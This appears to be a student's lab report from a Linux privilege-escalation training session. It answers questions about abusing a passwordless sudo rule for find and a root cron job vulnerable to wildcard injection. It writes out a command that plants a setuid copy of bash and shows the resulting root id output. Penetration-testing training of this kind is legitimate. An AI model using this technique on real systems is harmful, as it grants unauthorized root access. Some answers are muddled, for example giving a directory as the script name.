==================================================
SESSION 23: ESCALATION PATH REPORT (LINUX)
==================================================
MICRO-LAB (SUDO):
1. Command used to escalate via 'find': 
   find (sudo misconfiguration - NOPASSWD: /usr/bin/find)

DEEP DIVE (CRON):
1. Name of the root-owned script found:
    /home/limited_user/backups
2. The specific command inside that script that was vulnerable:
   N/A (Linux wildcard injection, no msfvenom required)
   echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > runme.sh
3. Final proof of root (output of 'id'):
   uid=1001(limited_user) gid=1001(limited_user) euid=0(root) egid=0(root) groups=0(root),1001(limited_user)
